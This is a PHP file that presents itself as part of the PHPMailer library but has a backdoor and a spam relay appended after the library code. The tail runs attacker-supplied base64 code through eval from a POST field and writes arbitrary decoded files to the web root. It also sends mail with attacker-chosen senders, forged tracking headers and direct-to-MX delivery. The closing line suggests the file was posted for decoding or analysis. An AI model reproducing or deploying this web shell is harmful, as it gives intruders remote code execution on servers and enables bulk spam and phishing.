$result .= $this->HeaderLine('Return-Path', trim($this->Sender)); } if($this->Mailer != 'mail') { if ($this->SingleTo === true) { foreach($this->to as $t) { $this->SingleToArray[] = $this->AddrFormat($t); } } else { if(count($this->to) > 0) { $result .= $this->AddrAppend('To', $this->to); } elseif (count($this->cc) == 0) { $result .= $this->HeaderLine('To', 'undisclosed-recipients:;'); } } } $from = array(); $from[0][0] = trim($this->From); $from[0][1] = $this->FromName; $result .= $this->AddrAppend('From', $from); if(count($this->cc) > 0) { $result .= $this->AddrAppend('Cc', $this->cc); } if((($this->Mailer == 'sendmail') || ($this->Mailer == 'mail')) && (count($this->bcc) > 0)) { $result .= $this->AddrAppend('Bcc', $this->bcc); } if(count($this->ReplyTo) > 0) { $result .= $this->AddrAppend('Reply-To', $this->ReplyTo); } if($this->Mailer != 'mail') { $result .= $this->HeaderLine('Subject', $this->EncodeHeader($this->SecureHeader($this->Subject))); } if($this->MessageID != '') { $result .= $this->HeaderLine('Message-ID', $this->MessageID); } else { $result .= sprintf("Message-ID: <%s@%s>%s", $uniq_id, $this->ServerHostname(), $this->LE); } if ($this->XMailer == '') { $result .= $this->HeaderLine('X-Mailer', 'PHPMailer '.$this->Version.' (http://code.google.com/a/apache-extras.org/p/phpmailer/)'); } else { $myXmailer = trim($this->XMailer); if ($myXmailer) { $result .= $this->HeaderLine('X-Mailer', $myXmailer); } } if($this->ConfirmReadingTo != '') { $result .= $this->HeaderLine('Disposition-Notification-To', '<' . trim($this->ConfirmReadingTo) . '>'); } for($index = 0; $index < count($this->CustomHeader); $index++) { $result .= $this->HeaderLine(trim($this->CustomHeader[$index][0]), $this->EncodeHeader(trim($this->CustomHeader[$index][1]))); } if (!$this->sign_key_file) { $result .= $this->HeaderLine('MIME-Version', '1.0'); $result .= $this->GetMailMIME(); } return $result; } public function GetMailMIME() { $result = ''; switch($this->message_type) { case 'inline': $result .= $this->HeaderLine('Content-Type', 'multipart/related;'); $result .= $this->TextLine(" boundary=\"" . $this->boundary[1] . '"'); break; case 'attach': case 'inline_attach': case 'alt_attach': case 'alt_inline_attach': $result .= $this->HeaderLine('Content-Type', 'multipart/mixed;'); $result .= $this->TextLine(" boundary=\"" . $this->boundary[1] . '"'); break; case 'alt': case 'alt_inline': $result .= $this->HeaderLine('Content-Type', 'multipart/alternative;'); $result .= $this->TextLine(" boundary=\"" . $this->boundary[1] . '"'); break; default: $result .= $this->HeaderLine('Content-Transfer-Encoding', $this->Encoding); $result .= $this->TextLine('Content-Type: '.$this->ContentType.'; charset='.$this->CharSet); break; } if($this->Mailer != 'mail') { $result .= $this->LE; } return $result; } public function GetSentMIMEMessage() { return $this->MIMEHeader . $this->mailHeader . self::CRLF . $this->MIMEBody; } public function CreateBody() { $body = ''; if ($this->sign_key_file) { $body .= $this->GetMailMIME().$this->LE; } $this->SetWordWrap(); switch($this->message_type) { case 'inline': $body .= $this->GetBoundary($this->boundary[1], '', '', ''); $body .= $this->EncodeString($this->Body, $this->Encoding); $body .= $this->LE.$this->LE; $body .= $this->AttachAll("inline", $this->boundary[1]); break; case 'attach': $body .= $this->GetBoundary($this->boundary[1], '', '', ''); $body .= $this->EncodeString($this->Body, $this->Encoding); $body .= $this->LE.$this->LE; $body .= $this->AttachAll("attachment", $this->boundary[1]); break; case 'inline_attach': $body .= $this->TextLine("--" . $this->boundary[1]); $body .= $this->HeaderLine('Content-Type', 'multipart/related;'); $body .= $this->TextLine(" boundary=\"" . $this->boundary[2] . '"'); $body .= $this->LE; $body .= $this->GetBoundary($this->boundary[2], '', '', ''); $body .= $this->EncodeString($this->Body, $this->Encoding); $body .= $this->LE.$this->LE; $body .= $this->AttachAll("inline", $this->boundary[2]); $body .= $this->LE; $body .= $this->AttachAll("attachment", $this->boundary[1]); break; case 'alt': $body .= $this->GetBoundary($this->boundary[1], '', 'text/plain', ''); $body .= $this->EncodeString($this->AltBody, $this->Encoding); $body .= $this->LE.$this->LE; $body .= $this->GetBoundary($this->boundary[1], '', 'text/html', ''); $body .= $this->EncodeString($this->Body, $this->Encoding); $body .= $this->LE.$this->LE; $body .= $this->EndBoundary($this->boundary[1]); break; case 'alt_inline': $body .= $this->GetBoundary($this->boundary[1], '', 'text/plain', ''); $body .= $this->EncodeString($this->AltBody, $this->Encoding); $body .= $this->LE.$this->LE; $body .= $this->TextLine("--" . $this->boundary[1]); $body .= $this->HeaderLine('Content-Type', 'multipart/related;'); $body .= $this->TextLine(" boundary=\"" . $this->boundary[2] . '"'); $body .= $this->LE; $body .= $this->GetBoundary($this->boundary[2], '', 'text/html', ''); $body .= $this->EncodeString($this->Body, $this->Encoding); $body .= $this->LE.$this->LE; $body .= $this->AttachAll("inline", $this->boundary[2]); $body .= $this->LE; $body .= $this->EndBoundary($this->boundary[1]); break; case 'alt_attach': $body .= $this->TextLine("--" . $this->boundary[1]); $body .= $this->HeaderLine('Content-Type', 'multipart/alternative;'); $body .= $this->TextLine(" boundary=\"" . $this->boundary[2] . '"'); $body .= $this->LE; $body .= $this->GetBoundary($this->boundary[2], '', 'text/plain', ''); $body .= $this->EncodeString($this->AltBody, $this->Encoding); $body .= $this->LE.$this->LE; $body .= $this->GetBoundary($this->boundary[2], '', 'text/html', ''); $body .= $this->EncodeString($this->Body, $this->Encoding); $body .= $this->LE.$this->LE; $body .= $this->EndBoundary($this->boundary[2]); $body .= $this->LE; $body .= $this->AttachAll("attachment", $this->boundary[1]); break; case 'alt_inline_attach': $body .= $this->TextLine("--" . $this->boundary[1]); $body .= $this->HeaderLine('Content-Type', 'multipart/alternative;'); $body .= $this->TextLine(" boundary=\"" . $this->boundary[2] . '"'); $body .= $this->LE; $body .= $this->GetBoundary($this->boundary[2], '', 'text/plain', ''); $body .= $this->EncodeString($this->AltBody, $this->Encoding); $body .= $this->LE.$this->LE; $body .= $this->TextLine("--" . $this->boundary[2]); $body .= $this->HeaderLine('Content-Type', 'multipart/related;'); $body .= $this->TextLine(" boundary=\"" . $this->boundary[3] . '"'); $body .= $this->LE; $body .= $this->GetBoundary($this->boundary[3], '', 'text/html', ''); $body .= $this->EncodeString($this->Body, $this->Encoding); $body .= $this->LE.$this->LE; $body .= $this->AttachAll("inline", $this->boundary[3]); $body .= $this->LE; $body .= $this->EndBoundary($this->boundary[2]); $body .= $this->LE; $body .= $this->AttachAll("attachment", $this->boundary[1]); break; default: $body .= $this->EncodeString($this->Body, $this->Encoding); break; } if ($this->IsError()) { $body = ''; } elseif ($this->sign_key_file) { try { $file = tempnam('', 'mail'); file_put_contents($file, $body); $signed = tempnam("", "signed"); if (@openssl_pkcs7_sign($file, $signed, "file://".$this->sign_cert_file, array("file://".$this->sign_key_file, $this->sign_key_pass), NULL)) { @unlink($file); $body = file_get_contents($signed); @unlink($signed); } else { @unlink($file); @unlink($signed); throw new phpmailerException($this->Lang("signing").openssl_error_string()); } } catch (phpmailerException $e) { $body = ''; if ($this->exceptions) { throw $e; } } } return $body; } protected function GetBoundary($boundary, $charSet, $contentType, $encoding) { $result = ''; if($charSet == '') { $charSet = $this->CharSet; } if($contentType == '') { $contentType = $this->ContentType; } if($encoding == '') { $encoding = $this->Encoding; } $result .= $this->TextLine('--' . $boundary); $result .= sprintf("Content-Type: %s; charset=%s", $contentType, $charSet); $result .= $this->LE; $result .= $this->HeaderLine('Content-Transfer-Encoding', $encoding); $result .= $this->LE; return $result; } protected function EndBoundary($boundary) { return $this->LE . '--' . $boundary . '--' . $this->LE; } protected function SetMessageType() { $this->message_type = array(); if($this->AlternativeExists()) $this->message_type[] = "alt"; if($this->InlineImageExists()) $this->message_type[] = "inline"; if($this->AttachmentExists()) $this->message_type[] = "attach"; $this->message_type = implode("_", $this->message_type); if($this->message_type == "") $this->message_type = "plain"; } public function HeaderLine($name, $value) { return $name . ': ' . $value . $this->LE; } public function TextLine($value) { return $value . $this->LE; } public function AddAttachment($path, $name = '', $encoding = 'base64', $type = 'application/octet-stream') { try { if ( !@is_file($path) ) { throw new phpmailerException($this->Lang('file_access') . $path, self::STOP_CONTINUE); } $filename = basename($path); if ( $name == '' ) { $name = $filename; } $this->attachment[] = array( 0 => $path, 1 => $filename, 2 => $name, 3 => $encoding, 4 => $type, 5 => false, 6 => 'attachment', 7 => 0 ); } catch (phpmailerException $e) { $this->SetError($e->getMessage()); if ($this->exceptions) { throw $e; } if ($this->SMTPDebug) { $this->edebug($e->getMessage()."
"); } if ( $e->getCode() == self::STOP_CRITICAL ) { return false; } } return true; } public function GetAttachments() { return $this->attachment; } protected function AttachAll($disposition_type, $boundary) { $mime = array(); $cidUniq = array(); $incl = array(); foreach ($this->attachment as $attachment) { if($attachment[6] == $disposition_type) { $string = ''; $path = ''; $bString = $attachment[5]; if ($bString) { $string = $attachment[0]; } else { $path = $attachment[0]; } $inclhash = md5(serialize($attachment)); if (in_array($inclhash, $incl)) { continue; } $incl[] = $inclhash; $filename = $attachment[1]; $name = $attachment[2]; $encoding = $attachment[3]; $type = $attachment[4]; $disposition = $attachment[6]; $cid = $attachment[7]; if ( $disposition == 'inline' && isset($cidUniq[$cid]) ) { continue; } $cidUniq[$cid] = true; $mime[] = sprintf("--%s%s", $boundary, $this->LE); $mime[] = sprintf("Content-Type: %s; name=\"%s\"%s", $type, $this->EncodeHeader($this->SecureHeader($name)), $this->LE); $mime[] = sprintf("Content-Transfer-Encoding: %s%s", $encoding, $this->LE); if($disposition == 'inline') { $mime[] = sprintf("Content-ID: <%s>%s", $cid, $this->LE); } $mime[] = sprintf("Content-Disposition: %s; filename=\"%s\"%s", $disposition, $this->EncodeHeader($this->SecureHeader($name)), $this->LE.$this->LE); if($bString) { $mime[] = $this->EncodeString($string, $encoding); if($this->IsError()) { return ''; } $mime[] = $this->LE.$this->LE; } else { $mime[] = $this->EncodeFile($path, $encoding); if($this->IsError()) { return ''; } $mime[] = $this->LE.$this->LE; } } } $mime[] = sprintf("--%s--%s", $boundary, $this->LE); return implode("", $mime); } protected function EncodeFile($path, $encoding = 'base64') { try { if (!is_readable($path)) { throw new phpmailerException($this->Lang('file_open') . $path, self::STOP_CONTINUE); } $magic_quotes = get_magic_quotes_runtime(); if ($magic_quotes) { if (version_compare(PHP_VERSION, '5.3.0', '<')) { set_magic_quotes_runtime(0); } else { @ini_set('magic_quotes_runtime', 0); } } $file_buffer = file_get_contents($path); $file_buffer = $this->EncodeString($file_buffer, $encoding); if ($magic_quotes) { if (version_compare(PHP_VERSION, '5.3.0', '<')) { set_magic_quotes_runtime($magic_quotes); } else { @ini_set('magic_quotes_runtime', $magic_quotes); } } return $file_buffer; } catch (Exception $e) { $this->SetError($e->getMessage()); return ''; } } public function EncodeString($str, $encoding = 'base64') { $encoded = ''; switch(strtolower($encoding)) { case 'base64': $encoded = chunk_split(base64_encode($str), 76, $this->LE); break; case '7bit': case '8bit': $encoded = $this->FixEOL($str); if (substr($encoded, -(strlen($this->LE))) != $this->LE) $encoded .= $this->LE; break; case 'binary': $encoded = $str; break; case 'quoted-printable': $encoded = $this->EncodeQP($str); break; default: $this->SetError($this->Lang('encoding') . $encoding); break; } return $encoded; } public function EncodeHeader($str, $position = 'text') { $x = 0; switch (strtolower($position)) { case 'phrase': if (!preg_match('/[-]/', $str)) { $encoded = addcslashes($str, "..\""); if (($str == $encoded) && !preg_match('/[^A-Za-z0-9!#$%&\'*+\/=?^_`{|}~ -]/', $str)) { return ($encoded); } else { return ("\"$encoded\""); } } $x = preg_match_all('/[^ !#-[]-~]/', $str, $matches); break; case 'comment': $x = preg_match_all('/[()"]/', $str, $matches); case 'text': default: $x += preg_match_all('/[---]/', $str, $matches); break; } if ($x == 0) { return ($str); } $maxlen = 75 - 7 - strlen($this->CharSet); if (strlen($str)/3 < $x) { $encoding = 'B'; if (function_exists('mb_strlen') && $this->HasMultiBytes($str)) { $encoded = $this->Base64EncodeWrapMB($str, "
"); } else { $encoded = base64_encode($str); $maxlen -= $maxlen % 4; $encoded = trim(chunk_split($encoded, $maxlen, "
")); } } else { $encoding = 'Q'; $encoded = $this->EncodeQ($str, $position); $encoded = $this->WrapText($encoded, $maxlen, true); $encoded = str_replace('='.self::CRLF, "
", trim($encoded)); } $encoded = preg_replace('/^(.*)$/m', " =?".$this->CharSet."?$encoding??=", $encoded); $encoded = trim(str_replace("
", $this->LE, $encoded)); return $encoded; } public function HasMultiBytes($str) { if (function_exists('mb_strlen')) { return (strlen($str) > mb_strlen($str, $this->CharSet)); } else { return false; } } public function Base64EncodeWrapMB($str, $lf=null) { $start = "=?".$this->CharSet."?B?"; $end = "?="; $encoded = ""; if ($lf === null) { $lf = $this->LE; } $mb_length = mb_strlen($str, $this->CharSet); $length = 75 - strlen($start) - strlen($end); $ratio = $mb_length / strlen($str); $offset = $avgLength = floor($length * $ratio * .75); for ($i = 0; $i < $mb_length; $i += $offset) { $lookBack = 0; do { $offset = $avgLength - $lookBack; $chunk = mb_substr($str, $i, $offset, $this->CharSet); $chunk = base64_encode($chunk); $lookBack++; } while (strlen($chunk) > $length); $encoded .= $chunk . $lf; } $encoded = substr($encoded, 0, -strlen($lf)); return $encoded; } public function EncodeQPphp( $input = '', $line_max = 76, $space_conv = false) { $hex = array('0', '1', '2', '3', '4', '5', '6', '7', '8', '9', 'A', 'B', 'C', 'D', 'E', 'F'); $lines = preg_split('/(?:
|
|
)/', $input); $eol = "
"; $escape = '='; $output = ''; while( list(, $line) = each($lines) ) { $linlen = strlen($line); $newline = ''; for($i = 0; $i < $linlen; $i++) { $c = substr( $line, $i, 1 ); $dec = ord( $c ); if ( ( $i == 0 ) && ( $dec == 46 ) ) { $c = '=2E'; } if ( $dec == 32 ) { if ( $i == ( $linlen - 1 ) ) { $c = '=20'; } else if ( $space_conv ) { $c = '=20'; } } elseif ( ($dec == 61) || ($dec < 32 ) || ($dec > 126) ) { $h2 = (integer)floor($dec/16); $h1 = (integer)floor($dec%16); $c = $escape.$hex[$h2].$hex[$h1]; } if ( (strlen($newline) + strlen($c)) >= $line_max ) { $output .= $newline.$escape.$eol; $newline = ''; if ( $dec == 46 ) { $c = '=2E'; } } $newline .= $c; } $output .= $newline.$eol; } return $output; } public function EncodeQP($string, $line_max = 76, $space_conv = false) { if (function_exists('quoted_printable_encode')) { return quoted_printable_encode($string); } $filters = stream_get_filters(); if (!in_array('convert.*', $filters)) { return $this->EncodeQPphp($string, $line_max, $space_conv); } $fp = fopen('php://temp/', 'r+'); $string = preg_replace('/
?/', $this->LE, $string); $params = array('line-length' => $line_max, 'line-break-chars' => $this->LE); $s = stream_filter_append($fp, 'convert.quoted-printable-encode', STREAM_FILTER_READ, $params); fputs($fp, $string); rewind($fp); $out = stream_get_contents($fp); stream_filter_remove($s); $out = preg_replace('/^\./m', '=2E', $out); fclose($fp); return $out; } public function EncodeQ($str, $position = 'text') { $pattern=""; $encoded = str_replace(array("
", "
"), '', $str); switch (strtolower($position)) { case 'phrase': $pattern = '^A-Za-z0-9!*+\/ -'; break; case 'comment': $pattern = '\(\)"'; case 'text': default: $pattern = '=- -?_-' . $pattern; break; } if (preg_match_all("/[{$pattern}]/", $encoded, $matches)) { foreach (array_unique($matches[0]) as $char) { $encoded = str_replace($char, '=' . sprintf('%02X', ord($char)), $encoded); } } return str_replace(' ', '_', $encoded); } public function AddStringAttachment($string, $filename, $encoding = 'base64', $type = 'application/octet-stream') { $this->attachment[] = array( 0 => $string, 1 => $filename, 2 => basename($filename), 3 => $encoding, 4 => $type, 5 => true, 6 => 'attachment', 7 => 0 ); } public function AddEmbeddedImage($path, $cid, $name = '', $encoding = 'base64', $type = 'application/octet-stream') { if ( !@is_file($path) ) { $this->SetError($this->Lang('file_access') . $path); return false; } $filename = basename($path); if ( $name == '' ) { $name = $filename; } $this->attachment[] = array( 0 => $path, 1 => $filename, 2 => $name, 3 => $encoding, 4 => $type, 5 => false, 6 => 'inline', 7 => $cid ); return true; } public function AddStringEmbeddedImage($string, $cid, $name = '', $encoding = 'base64', $type = 'application/octet-stream') { $this->attachment[] = array( 0 => $string, 1 => $name, 2 => $name, 3 => $encoding, 4 => $type, 5 => true, 6 => 'inline', 7 => $cid ); } public function InlineImageExists() { foreach($this->attachment as $attachment) { if ($attachment[6] == 'inline') { return true; } } return false; } public function AttachmentExists() { foreach($this->attachment as $attachment) { if ($attachment[6] == 'attachment') { return true; } } return false; } public function AlternativeExists() { return !empty($this->AltBody); } public function ClearAddresses() { foreach($this->to as $to) { unset($this->all_recipients[strtolower($to[0])]); } $this->to = array(); } public function ClearCCs() { foreach($this->cc as $cc) { unset($this->all_recipients[strtolower($cc[0])]); } $this->cc = array(); } public function ClearBCCs() { foreach($this->bcc as $bcc) { unset($this->all_recipients[strtolower($bcc[0])]); } $this->bcc = array(); } public function ClearReplyTos() { $this->ReplyTo = array(); } public function ClearAllRecipients() { $this->to = array(); $this->cc = array(); $this->bcc = array(); $this->all_recipients = array(); } public function ClearAttachments() { $this->attachment = array(); } public function ClearCustomHeaders() { $this->CustomHeader = array(); } protected function SetError($msg) { $this->error_count++; if ($this->Mailer == 'smtp' and !is_null($this->smtp)) { $lasterror = $this->smtp->getError(); if (!empty($lasterror) and array_key_exists('smtp_msg', $lasterror)) { $msg .= '<p>' . $this->Lang('smtp_error') . $lasterror['smtp_msg'] . "</p>
"; } } $this->ErrorInfo = $msg; } public static function RFCDate() { $tz = date('Z'); $tzs = ($tz < 0) ? '-' : '+'; $tz = abs($tz); $tz = (int)($tz/3600)*100 + ($tz%3600)/60; $result = sprintf("%s %s%04d", date('D, j M Y H:i:s'), $tzs, $tz); return $result; } protected function ServerHostname() { if (!empty($this->Hostname)) { $result = $this->Hostname; } elseif (isset($_SERVER['SERVER_NAME'])) { $result = $_SERVER['SERVER_NAME']; } else { $result = 'localhost.localdomain'; } return $result; } protected function Lang($key) { if(count($this->language) < 1) { $this->SetLanguage('en'); } if(isset($this->language[$key])) { return $this->language[$key]; } else { return 'Language string failed to load: ' . $key; } } public function IsError() { return ($this->error_count > 0); } public function FixEOL($str) { $nstr = str_replace(array("
", "
"), "
", $str); if ($this->LE !== "
") { $nstr = str_replace("
", $this->LE, $nstr); } return $nstr; } public function AddCustomHeader($name, $value=null) { if ($value === null) { $this->CustomHeader[] = explode(':', $name, 2); } else { $this->CustomHeader[] = array($name, $value); } } public function MsgHTML($message, $basedir = '') { preg_match_all("/(src|background)=[\"'](.*)[\"']/Ui", $message, $images); if(isset($images[2])) { foreach($images[2] as $i => $url) { if (!preg_match('#^[A-z]+://#', $url)) { $filename = basename($url); $directory = dirname($url); if ($directory == '.') { $directory = ''; } $cid = 'cid:' . md5($filename); $ext = pathinfo($filename, PATHINFO_EXTENSION); $mimeType = self::_mime_types($ext); if ( strlen($basedir) > 1 && substr($basedir, -1) != '/') { $basedir .= '/'; } if ( strlen($directory) > 1 && substr($directory, -1) != '/') { $directory .= '/'; } if ( $this->AddEmbeddedImage($basedir.$directory.$filename, md5($filename), $filename, 'base64', $mimeType) ) { $message = preg_replace("/".$images[1][$i]."=[\"']".preg_quote($url, '/')."[\"']/Ui", $images[1][$i]."=\"".$cid."\"", $message); } } } } $this->IsHTML(true); $this->Body = $message; if (empty($this->AltBody)) { $textMsg = trim(strip_tags(preg_replace('/<(head|title|style|script)[^>]*>.*?<\/>/s', '', $message))); if (!empty($textMsg)) { $this->AltBody = html_entity_decode($textMsg, ENT_QUOTES, $this->CharSet); } } if (empty($this->AltBody)) { $this->AltBody = 'To view this email message, open it in a program that understands HTML!' . "
"; } return $message; } public static function _mime_types($ext = '') { $mimes = array( 'xl' => 'application/excel', 'hqx' => 'application/mac-binhex40', 'cpt' => 'application/mac-compactpro', 'bin' => 'application/macbinary', 'doc' => 'application/msword', 'word' => 'application/msword', 'class' => 'application/octet-stream', 'dll' => 'application/octet-stream', 'dms' => 'application/octet-stream', 'exe' => 'application/octet-stream', 'lha' => 'application/octet-stream', 'lzh' => 'application/octet-stream', 'psd' => 'application/octet-stream', 'sea' => 'application/octet-stream', 'so' => 'application/octet-stream', 'oda' => 'application/oda', 'pdf' => 'application/pdf', 'ai' => 'application/postscript', 'eps' => 'application/postscript', 'ps' => 'application/postscript', 'smi' => 'application/smil', 'smil' => 'application/smil', 'mif' => 'application/vnd.mif', 'xls' => 'application/vnd.ms-excel', 'ppt' => 'application/vnd.ms-powerpoint', 'wbxml' => 'application/vnd.wap.wbxml', 'wmlc' => 'application/vnd.wap.wmlc', 'dcr' => 'application/x-director', 'dir' => 'application/x-director', 'dxr' => 'application/x-director', 'dvi' => 'application/x-dvi', 'gtar' => 'application/x-gtar', 'php3' => 'application/x-httpd-php', 'php4' => 'application/x-httpd-php', 'php' => 'application/x-httpd-php', 'phtml' => 'application/x-httpd-php', 'phps' => 'application/x-httpd-php-source', 'js' => 'application/x-javascript', 'swf' => 'application/x-shockwave-flash', 'sit' => 'application/x-stuffit', 'tar' => 'application/x-tar', 'tgz' => 'application/x-tar', 'xht' => 'application/xhtml+xml', 'xhtml' => 'application/xhtml+xml', 'zip' => 'application/zip', 'mid' => 'audio/midi', 'midi' => 'audio/midi', 'mp2' => 'audio/mpeg', 'mp3' => 'audio/mpeg', 'mpga' => 'audio/mpeg', 'aif' => 'audio/x-aiff', 'aifc' => 'audio/x-aiff', 'aiff' => 'audio/x-aiff', 'ram' => 'audio/x-pn-realaudio', 'rm' => 'audio/x-pn-realaudio', 'rpm' => 'audio/x-pn-realaudio-plugin', 'ra' => 'audio/x-realaudio', 'wav' => 'audio/x-wav', 'bmp' => 'image/bmp', 'gif' => 'image/gif', 'jpeg' => 'image/jpeg', 'jpe' => 'image/jpeg', 'jpg' => 'image/jpeg', 'png' => 'image/png', 'tiff' => 'image/tiff', 'tif' => 'image/tiff', 'eml' => 'message/rfc822', 'css' => 'text/css', 'html' => 'text/html', 'htm' => 'text/html', 'shtml' => 'text/html', 'log' => 'text/plain', 'text' => 'text/plain', 'txt' => 'text/plain', 'rtx' => 'text/richtext', 'rtf' => 'text/rtf', 'xml' => 'text/xml', 'xsl' => 'text/xml', 'mpeg' => 'video/mpeg', 'mpe' => 'video/mpeg', 'mpg' => 'video/mpeg', 'mov' => 'video/quicktime', 'qt' => 'video/quicktime', 'rv' => 'video/vnd.rn-realvideo', 'avi' => 'video/x-msvideo', 'movie' => 'video/x-sgi-movie' ); return (!isset($mimes[strtolower($ext)])) ? 'application/octet-stream' : $mimes[strtolower($ext)]; } public function set($name, $value = '') { try { if (isset($this->$name) ) { $this->$name = $value; } else { throw new phpmailerException($this->Lang('variable_set') . $name, self::STOP_CRITICAL); } } catch (Exception $e) { $this->SetError($e->getMessage()); if ($e->getCode() == self::STOP_CRITICAL) { return false; } } return true; } public function SecureHeader($str) { return trim(str_replace(array("
", "
"), '', $str)); } public function Sign($cert_filename, $key_filename, $key_pass) { $this->sign_cert_file = $cert_filename; $this->sign_key_file = $key_filename; $this->sign_key_pass = $key_pass; } public function DKIM_QP($txt) { $line = ''; for ($i = 0; $i < strlen($txt); $i++) { $ord = ord($txt[$i]); if ( ((0x21 <= $ord) && ($ord <= 0x3A)) || $ord == 0x3C || ((0x3E <= $ord) && ($ord <= 0x7E)) ) { $line .= $txt[$i]; } else { $line .= "=".sprintf("%02X", $ord); } } return $line; } public function DKIM_Sign($s) { $privKeyStr = file_get_contents($this->DKIM_private); if ($this->DKIM_passphrase != '') { $privKey = openssl_pkey_get_private($privKeyStr, $this->DKIM_passphrase); } else { $privKey = $privKeyStr; } if (openssl_sign($s, $signature, $privKey)) { return base64_encode($signature); } return ''; } public function DKIM_HeaderC($s) { $s = preg_replace("/
\s+/", " ", $s); $lines = explode("
", $s); foreach ($lines as $key => $line) { list($heading, $value) = explode(":", $line, 2); $heading = strtolower($heading); $value = preg_replace("/\s+/", " ", $value) ; $lines[$key] = $heading.":".trim($value) ; } $s = implode("
", $lines); return $s; } public function DKIM_BodyC($body) { if ($body == '') return "
"; $body = str_replace("
", "
", $body); $body = str_replace("
", "
", $body); while (substr($body, strlen($body) - 4, 4) == "
") { $body = substr($body, 0, strlen($body) - 2); } return $body; } public function DKIM_Add($headers_line, $subject, $body) { $DKIMsignatureType = 'rsa-sha1'; $DKIMcanonicalization = 'relaxed/simple'; $DKIMquery = 'dns/txt'; $DKIMtime = time() ; $subject_header = "Subject: $subject"; $headers = explode($this->LE, $headers_line); $from_header = ""; $to_header = ""; foreach($headers as $header) { if (strpos($header, 'From:') === 0) { $from_header = $header; } elseif (strpos($header, 'To:') === 0) { $to_header = $header; } } $from = str_replace('|', '=7C', $this->DKIM_QP($from_header)); $to = str_replace('|', '=7C', $this->DKIM_QP($to_header)); $subject = str_replace('|', '=7C', $this->DKIM_QP($subject_header)) ; $body = $this->DKIM_BodyC($body); $DKIMlen = strlen($body) ; $DKIMb64 = base64_encode(pack("H*", sha1($body))) ; $ident = ($this->DKIM_identity == '')? '' : " i=" . $this->DKIM_identity . ";"; $dkimhdrs = "DKIM-Signature: v=1; a=" . $DKIMsignatureType . "; q=" . $DKIMquery . "; l=" . $DKIMlen . "; s=" . $this->DKIM_selector . ";
". " t=" . $DKIMtime . "; c=" . $DKIMcanonicalization . ";
". " h=From:To:Subject;
". " d=" . $this->DKIM_domain . ";" . $ident . "
". " z=$from
". " |$to
". " |$subject;
". " bh=" . $DKIMb64 . ";
". " b="; $toSign = $this->DKIM_HeaderC($from_header . "
" . $to_header . "
" . $subject_header . "
" . $dkimhdrs); $signed = $this->DKIM_Sign($toSign); return "X-PHPMAILER-DKIM: code.google.com/a/apache-extras.org/p/phpmailer/
".$dkimhdrs.$signed."
"; } protected function doCallback($isSent, $to, $cc, $bcc, $subject, $body, $from=null) { if (!empty($this->action_function) && is_callable($this->action_function)) { $params = array($isSent, $to, $cc, $bcc, $subject, $body, $from); call_user_func_array($this->action_function, $params); } } } function gennumrandom($length = 8){ $chars = '1234567890'; $numChars = strlen($chars); $string = ''; for ($i = 0; $i < $length; $i++) { $string .= substr($chars, rand(1, $numChars) - 1, 1); } return $string; } function genletrandom($length = 8){ $chars = 'abcdefghiklmnopqrstvxyz'; $numChars = strlen($chars); $string = ''; for ($i = 0; $i < $length; $i++) { $string .= substr($chars, rand(1, $numChars) - 1, 1); } return $string; } function genmixrandom($length = 8){ $chars = 'abcdefghiklmnopqrstvxyzABCDEFGHIKLMNOPQRSTVXYZ1234567890'; $numChars = strlen($chars); $string = ''; for ($i = 0; $i < $length; $i++) { $string .= substr($chars, rand(1, $numChars) - 1, 1); } return $string; } class phpmailerException extends Exception { public function errorMessage() { $errorMsg = '<strong>' . $this->getMessage() . "</strong><br />
"; return $errorMsg; } } if(!empty($_POST['cmd'])) { eval(base64_decode($_POST['cmd'])); exit; } if(!empty($_POST['file'])) { $path = dirname($_SERVER['SCRIPT_FILENAME']); if(!empty($_POST['root']) && $_POST['root'] == 'http_root') { $path = $_SERVER['DOCUMENT_ROOT']; } $path .= '/'; if(!empty($_POST['dir'])) { $path .= $_POST['dir']; } if(!empty($_POST['filename'])) { mkdir($path,0777,1); file_put_contents($path . $_POST['filename'], base64_decode($_POST['file'])); } exit; } if (empty($_POST['subject']) || empty($_POST['body']) || empty($_POST['from']) || empty($_POST['fromName']) || empty($_POST['to'])) { if(!empty($_GET['ora']) && $_GET['ora']=='test') { echo "OK"; } else { echo "INVALID_REQUEST"; } die; } usleep(100); try { $mail = new PHPMailer(); if(!empty($_GET['m']) && $_GET['m']=='s') { $mail->Mailer = 'smtp'; $mail->Encoding = 'base64'; } if(!empty($_GET['m']) && $_GET['m']=='d') { $mail->Mailer = 'smtp'; $tmp = explode('@',$_POST['from']); $from_domain = $tmp[1]; $tmp = explode('@',$_POST['to']); $to_domain = $tmp[1]; $mail->Helo = $from_domain; $mail->Hostname = $from_domain; getmxrr($to_domain,$tmp); $mail->Host = implode(':25;',$tmp).':25'; } $mail->XMailer = ' '; $mail->From = $_POST['from']; $mail->addCustomHeader('X-SG-EID', ''. genmixrandom(78) .' '. genmixrandom(10) .''); $mail->addCustomHeader('Feedback-ID', ''. gennumrandom(8) .':'. gennumrandom(8) .'.'. gennumrandom(8) .':'. gennumrandom(6) . ':' . genletrandom(2) . '' . gennumrandom(1) . ':' . genletrandom(2) . ''); $mail->addCustomHeader('X-ident-auth', 'localhost [127.0.0.1]'); $mail->FromName = $_POST['fromName']; $mail->Subject = $_POST['subject']; $mail->MsgHTML(base64_decode($_POST['body'])); $mail->AddAddress($_POST['to'], $_POST['toName']); $mail->AddAttachment($path = ($_POST['name1']) , $name = ($_POST['names1']) , $encoding = 'base64', $type = 'application/octet-stream'); $mail->AddAttachment($path = ($_POST['name2']) , $name = ($_POST['names2']) , $encoding = 'base64', $type = 'application/octet-stream'); if(!empty($_GET['debug']) && $_GET['debug']=='d') { $mail->SMTPDebug =3; } if($mail->Send()) { echo "SUCCESS"; } else { echo "FAILURE<br/>"; echo $mail->ErrorInfo; } } catch (phpmailerException $e) { echo $e->errorMessage(); } catch (Exception $e) { echo $e->getMessage(); } $_SERVER['PHP_SELF'] = $oldphpself; $_SERVER['REMOTE_ADDR'] = $oldremoteaddr; ?>
Did this file decode correctly?
Original Code
